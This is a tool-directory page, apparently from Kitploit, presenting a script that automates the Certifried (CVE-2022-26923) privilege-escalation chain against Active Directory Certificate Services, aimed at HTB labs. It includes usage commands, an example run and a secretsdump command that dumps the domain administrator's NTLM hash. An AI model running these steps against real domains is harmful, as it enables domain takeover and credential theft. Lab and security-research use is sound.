Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2022-26923 — Exploitation de CVE-2022-26923 | Kitploit
ツール/GitHubGitHub/eliasdekiniweek/cve-2022-26923
Privilege EscalationVulnerability AnalysisExploitationLateral MovementPost-ExploitationPenetration TestingAuthenticationLearning & EducationRed Teaming
GitHubeliasdekiniweek/cve-2022-26923

CVE-2022-26923

Exploitation de CVE-2022-26923

16ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る

CVE-2022-26923 – Certifried エクスプロイト (AD CS 悪用)

CVE-2022-26923 (Certifried) の悪用を自動化し、Active Directory Certificate Services (AD CS) と Resource-Based Constrained Delegation (RBCD) を悪用した特権昇格を可能にし、ドメイン管理者アカウントの NTLM ハッシュのダンプを実現します。

⚠️ 教育目的のみ / Lab / HTB

許可されていない環境では使用しないでください。


🎯 説明

このスクリプトは以下の攻撃チェーンを自動化します:

  1. 制御したマシンアカウントの作成
  2. dNSHostName の変更
  3. AD CS を介した証明書の要求
  4. 証明書による認証
  5. RBCD の悪用
  6. S4U2Self + S4U2Proxy
  7. administrator の Kerberos チケット取得
  8. secretsdump.py による NTLM ダンプ

🔗 脆弱性

  • CVE-2022-26923 – "Certifried"
  • AD CS を使用する Active Directory 環境に影響します
  • 不正に発行された証明書による Domain Controller のなりすましを可能にします

🛠 使用ツール

  • certipy-ad
  • bloodyAD
  • getST.py (Impacket)
  • secretsdump.py (Impacket)
  • openssl

📦 依存関係のインストール

root@kitploit:~
pipx install impacket
pipx install certipy-ad
pipx install bloodyad
sudo apt install openssl

🚀 使用方法

root@kitploit:~
chmod +x CVE-2022-26923.sh
./CVE-2022-26923.sh [options]

利用可能なオプション

root@kitploit:~
-d, --dc-ip          IP du Domain Controller
-D, --domain         Nom du domaine
-u, --user           Utilisateur valide
-p, --pass           Mot de passe utilisateur
-c, --comp-name      Nom machine contrôlée
-C, --comp-pass      Mot de passe machine
-a, --ca-name        Nom du Certificate Authority
-t, --template       Template certificat
-f, --pfx-file       Nom fichier PFX
-H, --dc-hostname    Hostname du DC
-A, --dc-account     Compte DC
-i, --impersonate    Compte cible à impersonner
--verbose            Mode debug
-h, --help           Aide

🧠 使用例 (HTB Certified)

root@kitploit:~
./CVE-2022-26923.sh \
-d 10.129.1.39 \
-D certifried.htb \
-u [email protected] \
-p 'Ch4ng3m3!' \
--verbose

🔥 期待される結果

実行終了時:

  • Kerberos チケット administrator.ccache
  • administrator アカウントの NTLM ダンプ

Kerberos の問題が発生した場合:

root@kitploit:~
KRB5CCNAME=/tmp/administrator.ccache secretsdump.py \
-just-dc-ntlm -just-dc-user administrator \
certifried.htb/[email protected] \
-k -no-pass -dc-ip 10.129.1.39

🧬 内部動作

root@kitploit:~
Machine Account Creation
        ↓
dNSHostName spoofing
        ↓
Certificate Request (Machine Template)
        ↓
Authentication via PFX
        ↓
RBCD abuse (bloodyAD)
        ↓
S4U2Self + S4U2Proxy
        ↓
Kerberos Ticket extraction
        ↓
NTLM dump via secretsdump

⚠️ 免責事項

このプロジェクトは以下の目的で提供されています:

  • 教育
  • セキュリティ研究
  • 個人ラボ
  • CTF / HTB

作者は許可されていない使用について一切の責任を負いません。


📜 ライセンス

MIT

ツールをダウンロード